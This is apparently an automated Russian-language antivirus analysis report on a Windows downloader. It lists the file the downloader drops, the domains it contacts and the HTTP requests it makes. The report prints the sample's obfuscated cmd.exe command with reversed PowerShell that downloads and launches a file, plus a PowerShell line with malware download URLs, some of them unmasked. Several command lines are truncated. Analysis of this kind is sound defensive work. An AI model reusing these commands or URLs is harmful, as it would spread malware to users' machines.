Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cmd.exe; ,,,,;/V^:^O;/C",;;;,(,(,(^se^t V^Y^w= ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ }}^{^hct^ac^}^}^k^a^erb^;F^Ln^$^ s^secor^P^-^tratS;^)^F^Ln$^(e^lifo^t^ev^as^.TH^E^$^;^)y^doBesn^op^s^er....
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\bgd.exe
Сетевая активность
Подключается к
- 'gr######ationgiveaways.com':80
- 'ul####tasarim.com':80
- 'cw##a.org':80
- 'pi###lding.com':80
TCP
Запросы HTTP GET
- http://gr######ationgiveaways.com/i0Qwfwrn
- http://ul####tasarim.com/MuRtWv3lI
- http://cw##a.org/POdR1eiw
- http://pi###lding.com/2pjNZddK
UDP
- DNS ASK gr######ationgiveaways.com
- DNS ASK ul####tasarim.com
- DNS ASK cw##a.org
- DNS ASK be###echicc.com
- DNS ASK pi###lding.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\cmd.exe; ,,,,;/V^:^O;/C",;;;,(,(,(^se^t V^Y^w= ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ }}^{^hct^ac^}^}^k^a^erb^;F^Ln^$^ s^secor^P^-^tratS;^)^F^Ln$^(e^lifo^t^ev^as^.TH^E^$^;^)y^doBesn^op^s^er....' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' ; ,,,,;/V:O;/C",;;;,(,(,(^se^t V^Y^w= ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ }}^{^hct^ac^}^}^k^a^erb^;F^Ln^$^ s^secor^P^-^tratS;^)^F^Ln$^(e^lifo^t^ev^as^.TH^E^$^;^)y^doBesn^op^s^er.t^ar^$^(^e^tirw^.T^HE$^...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $bbd='uCc';$FJp='http://gr######ationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Spli...
